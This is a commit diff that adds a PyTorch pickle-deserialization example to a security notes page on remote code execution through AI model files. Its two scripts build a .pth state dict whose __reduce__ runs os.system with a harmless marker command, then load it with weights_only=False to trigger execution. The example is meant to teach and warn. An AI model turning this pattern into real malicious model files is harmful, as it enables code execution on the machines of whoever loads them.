Skip to content

Commit 8ac9da8

Browse files
committed
example pytorch
1 parent b278df4 commit 8ac9da8

1 file changed

Lines changed: 43 additions & 0 deletions

File tree

src/AI/AI-Models-RCE.md

Lines changed: 43 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -26,5 +26,48 @@ At the time of the writting these are some examples of this type of vulneravilit
2626

2727
Moreover, there some python pickle based models like the ones used by [PyTorch](https://github.com/pytorch/pytorch/security) that can be used to execute arbitrary code on the system if they are not loaded with `weights_only=True`. So, any pickle based model might be specially susceptible to this type of attacks, even if they are not listed in the table above.
2828

29+
Example:
30+
31+
- Create the model:
32+
33+
```python
34+
# attacker_payload.py
35+
import torch
36+
import os
37+
38+
class MaliciousPayload:
39+
def __reduce__(self):
40+
# This code will be executed when unpickled (e.g., on model.load_state_dict)
41+
return (os.system, ("echo 'You have been hacked!' > /tmp/pwned.txt",))
42+
43+
# Create a fake model state dict with malicious content
44+
malicious_state = {"fc.weight": MaliciousPayload()}
45+
46+
# Save the malicious state dict
47+
torch.save(malicious_state, "malicious_state.pth")
48+
```
49+
50+
- Load the model:
51+
52+
```python
53+
# victim_load.py
54+
import torch
55+
import torch.nn as nn
56+
57+
class MyModel(nn.Module):
58+
def __init__(self):
59+
super().__init__()
60+
self.fc = nn.Linear(10, 1)
61+
62+
model = MyModel()
63+
64+
# ⚠️ This will trigger code execution from pickle inside the .pth file
65+
model.load_state_dict(torch.load("malicious_state.pth", weights_only=False))
66+
67+
# /tmp/pwned.txt is created even if you get an error
68+
```
69+
70+
71+
2972

3073
{{#include ../banners/hacktricks-training.md}}

0 commit comments

Comments
 (0)